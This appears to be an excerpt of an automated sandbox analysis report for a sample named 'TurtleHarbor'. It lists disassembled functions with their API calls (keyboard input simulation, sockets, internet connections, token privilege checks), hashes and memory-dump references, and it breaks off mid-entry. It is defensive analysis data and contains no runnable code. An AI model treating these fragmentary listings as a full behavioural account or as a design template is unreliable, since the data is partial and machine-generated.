Instruction ID: 9e54ac3a64acc6c09043fc91782c2495c08b5dd5da7b994e554bae451079381e
Opcode Fuzzy Hash: 0a3c7685d2c76c6d531d56e81ef3ad1ec7f7037a048ccc7ed9fd46f845609938
Instruction Fuzzy Hash: 48515F34A00208AFDF16DF58D884AAE7BBAFF45321F11815EF816DB2A0D730AD51CB90

Function 0033492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003349C0
__flush.LIBCMT ref: 003349E0
__write.LIBCMT ref: 00334A13
__flsbuf.LIBCMT ref: 00334A41

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
Instruction ID: 3de03f469ec78d1acca1cffcbce05d38ca4552c77130225d8ea1d3a8b1741f2c
Opcode Fuzzy Hash: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
Instruction Fuzzy Hash: 6D41943160070AABDF2ACFA9C8D0A6F7BA9AF45360F25816DE8558B650D774FD408B44

Function 0036A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0036A68A
__itow.LIBCMT ref: 0036A6BB

Part of subcall function 0036A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0036A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0036A724
__itow.LIBCMT ref: 0036A77B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c52bc93a79faed612b419cbcd2d7b59c17d09447fd3495176e344357e048c317
Instruction ID: 6c514dabc110c9cb0820f7ecbc4ed31f306fd01319cce931a93c72616a6fa367
Opcode Fuzzy Hash: c52bc93a79faed612b419cbcd2d7b59c17d09447fd3495176e344357e048c317
Instruction Fuzzy Hash: E741B074A00618AFDF22EF54D886BEE7BB9EF54750F044029F905A7291DB709E44CBA2

Function 00387095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 003870BC
WSAGetLastError.WSOCK32(00000000), ref: 003870CC

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00387130
WSAGetLastError.WSOCK32(00000000), ref: 0038713C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: e9be7ce652b05002bc2abd90ff4d964fb40058feba80129424d0599dc4692fb6
Instruction ID: e960dfb5b187391ef05c037eeacb935773422f5a4982b9f4d2bae4be01359434
Opcode Fuzzy Hash: e9be7ce652b05002bc2abd90ff4d964fb40058feba80129424d0599dc4692fb6
Instruction Fuzzy Hash: 3641B6717403006FEB1ABF24DC86F6A77E99B09B14F148458FA159F3C2D6749C418B91

Function 00386B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003A0980), ref: 00386B92
_strlen.LIBCMT ref: 00386BC4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 47a2cb586b91a67b9c89c3ad3e9a2e62698dd219bd2c6c81cab1c61af65accbb
Instruction ID: 0845415c84108380f5c3f5661007d8f6bbec73908d3f00e75f8586ada5d8de2d
Opcode Fuzzy Hash: 47a2cb586b91a67b9c89c3ad3e9a2e62698dd219bd2c6c81cab1c61af65accbb
Instruction Fuzzy Hash: 2541C671600214ABC71AFBA4DDD6EAEB7BDEF58310F148195F81A9F292DB30AD41C790

Function 0037BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0037BEE1
GetLastError.KERNEL32(?,00000000), ref: 0037BF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0037BF2C
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0037BF58

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 1c3f8f946e96eb17d25f500fa60022e3203629c37bfe5dc5693bc5bedd425728
Instruction ID: a8db948abab9fe2315fb067353e084f31b78fe185d303503c25b0cc79c56e7aa
Opcode Fuzzy Hash: 1c3f8f946e96eb17d25f500fa60022e3203629c37bfe5dc5693bc5bedd425728
Instruction Fuzzy Hash: 7F410835600A10DFCB26EF15D485A99BBF5EF89710B19C488E8499F762CB34FD42CB91

Function 00398E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00398F03

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ef95d5abb8b2346dd1cc960c6ad4d425d40f5ec4980e95c8d01ff398e197904c
Instruction ID: 0d2f6965c00fe6a8084fecf869a5aa6a7345a6e2d22a832e0e5081eda4bcca32
Opcode Fuzzy Hash: ef95d5abb8b2346dd1cc960c6ad4d425d40f5ec4980e95c8d01ff398e197904c
Instruction Fuzzy Hash: D931F231605108AEEF279B18EC49FAC37AAEB87320F145502FA42D61E0DF71E950CA51

Function 0039B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0039B1D2
GetWindowRect.USER32(?,?), ref: 0039B248
PtInRect.USER32(?,?,0039C6BC), ref: 0039B258
MessageBeep.USER32(00000000), ref: 0039B2C9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e91c4ccfd5daabb28a8ee19235ec4984aefcfc83e93af11ec355e7f2e7e4e470
Instruction ID: 6aef00bee2a75758c93d927157fd94ac8a9d0aa159793a99be275e219fe7b2f9
Opcode Fuzzy Hash: e91c4ccfd5daabb28a8ee19235ec4984aefcfc83e93af11ec355e7f2e7e4e470
Instruction Fuzzy Hash: 3641A030A04115DFDF13CF98EA85AADBBF9FF49350F1588A9E8989B260D330A941CF50

Function 003712D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00371326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00371342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003713A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003713FA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 91185bb6c73e1e2d10280a786ea4d2c379ab3602ecb7ae989e1dbe72b3889f9a
Instruction ID: dabec933f931ce68d7f68ff18db35c79834e4c35b436cc87d1da60ed9c0cbf36
Opcode Fuzzy Hash: 91185bb6c73e1e2d10280a786ea4d2c379ab3602ecb7ae989e1dbe72b3889f9a
Instruction Fuzzy Hash: 1D314B36A44208AEFF378A2D8C09BFE7BB9AB45310F04C21AF498569D1D37C89419B51

Function 00371410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00371465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00371481
PostMessageW.USER32(00000000,00000101,00000000), ref: 003714E0
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00371532

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: dc33baa3348e85967403ebfb037248009423c276bddfb38a64705836b936afea
Instruction ID: aac2b7c9d612fc9b05371b1f0ed2f35c445b5c3bc80633359b3d924f7a5280fd
Opcode Fuzzy Hash: dc33baa3348e85967403ebfb037248009423c276bddfb38a64705836b936afea
Instruction Fuzzy Hash: BA316232D402485EFF3B8B6E8C057FAB779AB86320F05C31AE489521D1C37C8D459B61

Function 003463F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0034642B
__isleadbyte_l.LIBCMT ref: 00346459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00346487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003464BD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 14cef6760b6cfe65d93c696d06147556165d93940943b09b6ccd794e3b4448c8
Instruction ID: 0750b7d51ccd40c8866465e45601aa09083e5d0c9cdb06b8e2394bc47e2f4c06
Opcode Fuzzy Hash: 14cef6760b6cfe65d93c696d06147556165d93940943b09b6ccd794e3b4448c8
Instruction Fuzzy Hash: 0431A131604256AFDF268F76CC86AAA7BE9FF42310F164029E8648F291DB31F850DB51

Function 0039552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0039553F

Part of subcall function 00373B34: GetWindowThreadProcessId.USER32(?,00000000), ref: 00373B4E
Part of subcall function 00373B34: GetCurrentThreadId.KERNEL32 ref: 00373B55
Part of subcall function 00373B34: AttachThreadInput.USER32(00000000,?,003755C0), ref: 00373B5C

GetCaretPos.USER32(?), ref: 00395550
ClientToScreen.USER32(00000000,?), ref: 0039558B
GetForegroundWindow.USER32 ref: 00395591

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 037d7cd1355feb19abafa4f7df12e251717c257eb9fa0f869f7894b47b56a170
Instruction ID: c60324d09e1068c2ed1fc1fbc5f4b942b19d691fe1f91a1fb335f97730a2b11e
Opcode Fuzzy Hash: 037d7cd1355feb19abafa4f7df12e251717c257eb9fa0f869f7894b47b56a170
Instruction Fuzzy Hash: 25314DB1900108AFDB05EFB5DC819EFB7FDEF89304F10446AE415EB201EA71AE408BA1

Function 0039CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

GetCursorPos.USER32(?), ref: 0039CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0034BCEC,?,?,?,?,?), ref: 0039CB8F
GetCursorPos.USER32(?), ref: 0039CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0034BCEC,?,?,?), ref: 0039CC16

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4f164dace99a86386e6efbe019f5b53e027a4adbb01ed943eee3034430e6d9a7
Instruction ID: 3f31ae57303831e60849b24f9819e05696d4d6a85d83da89d3953c3a3b636144
Opcode Fuzzy Hash: 4f164dace99a86386e6efbe019f5b53e027a4adbb01ed943eee3034430e6d9a7
Instruction Fuzzy Hash: 5331D035610018AFCF179F98CC89EFA7BB9EB0A350F044099F9059B261D3319D60EFA0

Function 00369274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368D3F
Part of subcall function 00368D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00368D49
Part of subcall function 00368D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D58
Part of subcall function 00368D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D5F
Part of subcall function 00368D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003692C1
_memcmp.LIBCMT ref: 003692E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0036931A
HeapFree.KERNEL32(00000000), ref: 00369321

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 8302cdee4e78bf3042132a494c199212066e89b6bcfc4aed5c1dc6d470c4549f
Instruction ID: c7ce4ce3034ed1d627777fbdd98ed7d10ce087a5be6c70ac7c725a8e7b507928
Opcode Fuzzy Hash: 8302cdee4e78bf3042132a494c199212066e89b6bcfc4aed5c1dc6d470c4549f
Instruction Fuzzy Hash: 1921AC72E40108EFDB15DFA4C945BEEBBBCFF45301F15805AE884AB294D770AA05CBA0

Function 00330BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00330BE2

Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377E51,?,?,00000000), ref: 00324041
Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377E51,?,?,00000000,?,?), ref: 00324065

_fprintf.LIBCMT ref: 00330C19
OutputDebugStringW.KERNEL32(?), ref: 0036694C

Part of subcall function 00334CCA: _flsall.LIBCMT ref: 00334CE3

__setmode.LIBCMT ref: 00330C4E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 7b211d30ae7df707ea406cc834cf9e6227e56e63d924216dfd49c30ccf182296
Instruction ID: d2d091b245770631d2105c595c59de9dc3a3826f4d11ab2852dd1c205b593a59
Opcode Fuzzy Hash: 7b211d30ae7df707ea406cc834cf9e6227e56e63d924216dfd49c30ccf182296
Instruction Fuzzy Hash: 031124719042046ADB0BB7A4AC87ABEBB6DDF45320F104156F2049E282EF256D8247A1

Function 00381E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00381E6F

Part of subcall function 00381EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00381F18
Part of subcall function 00381EF9: InternetCloseHandle.WININET(00000000), ref: 00381FB5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 54afc2b70107272718ff53fecce0ad6d78467649e8b25484aa8ded5ce3b3a7dd
Instruction ID: b27657ec9b0cd446cc877d5e5c14f401614dcdc6ab95cd1d6b179a38e8c280d0
Opcode Fuzzy Hash: 54afc2b70107272718ff53fecce0ad6d78467649e8b25484aa8ded5ce3b3a7dd
Instruction Fuzzy Hash: 1D218E31200705BFDB17AF608C01FBBB7AEBB84700F10415AFE4596A50DB72A9129B90

Function 00373F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,003A2C4C), ref: 00373F57
GetLastError.KERNEL32 ref: 00373F66
CreateDirectoryW.KERNEL32(?,00000000), ref: 00373F75
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003A2C4C), ref: 00373FD2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 57067f201b97eab6fccb0854ccc298d880fdf02ec082a310e134814528b3edae
Instruction ID: ae127ca6badf77f57da511df5bb555dfe2e619c6d11b1f6acf88fa314e1de7ef
Opcode Fuzzy Hash: 57067f201b97eab6fccb0854ccc298d880fdf02ec082a310e134814528b3edae
Instruction Fuzzy Hash: 6821E5709083119F8725DF28D8858AFB7F8FE5A3A4F108A1DF499C72A1D730DA45DB82

Function 0039634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 003963BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 003963D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 003963E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003963F3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 67df00d0849800ae12c1e4c52b0e1beaff2ac15807513e9999ab55f4ef41d3db
Instruction ID: c4cf68bca6cf7072dae0c0dbc9e1096efb6435e384515c7be768e7487222f6b1
Opcode Fuzzy Hash: 67df00d0849800ae12c1e4c52b0e1beaff2ac15807513e9999ab55f4ef41d3db
Instruction Fuzzy Hash: 9B11E635305514AFDB0AAB64DC96FBA779DEF8A320F14411DF916CB2E2CB60AD40CB94

Function 0036E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

